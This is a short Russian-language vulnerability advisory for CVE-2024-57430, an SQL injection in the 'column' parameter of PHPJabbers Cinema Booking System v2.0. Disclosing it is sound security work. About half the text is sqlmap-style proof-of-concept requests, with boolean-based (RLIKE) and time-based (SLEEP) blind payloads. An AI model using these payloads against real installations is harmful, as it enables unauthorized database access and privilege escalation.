
CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 уязвим к SQL-инъекциям, что приводит к несанкционированному доступу к данным и повышению привилегий.
Уязвимость SQL-инъекции в функции pjActionGetUser системы PHPJabbers Cinema Booking System v2.0 позволяет злоумышленникам манипулировать запросами к базе данных через параметр column. Эксплуатация этой уязвимости может привести к несанкционированному раскрытию информации, повышению привилегий или манипуляции с базой данных.
Уязвимый параметр: column
SQL-инъекция может привести к несанкционированному доступу к конфиденциальной информации, изменению базы данных и даже полному компрометированию сервера базы данных. Это представляет критическую угрозу для конфиденциальности, целостности и доступности приложения.
GET-запрос по URL: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=*&&direction=ASC&page=1&rowCount=10
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name RLIKE (SELECT (CASE WHEN (7874=7874) THEN 0x6e616d65 ELSE 0x28 END))&direction=ASC&page=1&rowCount=10
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name AND (SELECT 6530 FROM (SELECT(SLEEP(5)))UFOj)&direction=ASC&page=1&rowCount=10